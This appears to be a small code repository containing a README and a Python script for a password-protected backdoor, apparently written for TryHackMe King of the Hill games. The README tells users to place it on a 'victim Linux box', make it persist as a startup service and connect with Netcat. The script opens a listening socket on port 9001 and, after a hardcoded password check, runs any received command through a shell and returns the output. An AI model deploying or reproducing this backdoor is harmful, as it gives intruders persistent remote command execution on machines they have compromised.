├── README.md └── backdoor.py /README.md: -------------------------------------------------------------------------------- 1 | ## Password Protected Backdoor 2 | 3 | It's a simple password protected backdoor using subprocess to execute commands. 4 | Instructions: 5 | - Place on victim Linux box 6 | - Create a service to ensure it's running at startup 7 | - Use Netcat to connect to the Backdoor 8 | 9 | So why use this over other methods? 10 | Well, to be honest, you shouldn't lol. 11 | This is a more or less proof of concept for a King Of The Hill box for the Cyber Security training platform TryHackMe (https://tryhackme.com). 12 | 13 | Note: Traffic is NOT encrypted and is in CLEARTEXT. This is NOT SECURE and should not be treated as such. 14 | 15 | Created by Ronald Bartwitz 16 | 17 | To do: 18 | - [ ] Add support for Encryption 19 | -------------------------------------------------------------------------------- /backdoor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import subprocess 5 | import threading 6 | 7 | LOCALHOST = '0.0.0.0' 8 | PORT = 9001 9 | banner = (b""" 10 | ================================================ 11 | Password Protected Backdoor 12 | ================================================ 13 | 14 | """) 15 | class ClientThread(threading.Thread): 16 | def __init__(self,clientAddress,clientsocket): 17 | threading.Thread.__init__(self) 18 | self.csocket = clientsocket 19 | print ("New connection added: ", clientAddress) 20 | def run(self): 21 | print('Connected by', clientAddress) 22 | while True: 23 | self.csocket.send(banner) 24 | while True: 25 | data = self.csocket.recv(1024) 26 | if data.decode() == "INSERT PASSWORD HERE\n": 27 | self.csocket.send(b"Correct Password!\n") 28 | while True: 29 | data = self.csocket.recv(1024) 30 | self.csocket.send(b"Command: " + data) 31 | command = data.decode() 32 | proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE) 33 | output = proc.stdout.read() 34 | self.csocket.send(bytes(output)) 35 | else: 36 | self.csocket.send(b"Password Incorrect\n") 37 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 39 | s.bind((LOCALHOST, PORT)) 40 | print("Server started") 41 | print("Waiting for clients to connect...") 42 | 43 | while True: 44 | s.listen(1000) 45 | clientsock, clientAddress = s.accept() 46 | newthread = ClientThread(clientAddress, clientsock) 47 | newthread.start() 48 | --------------------------------------------------------------------------------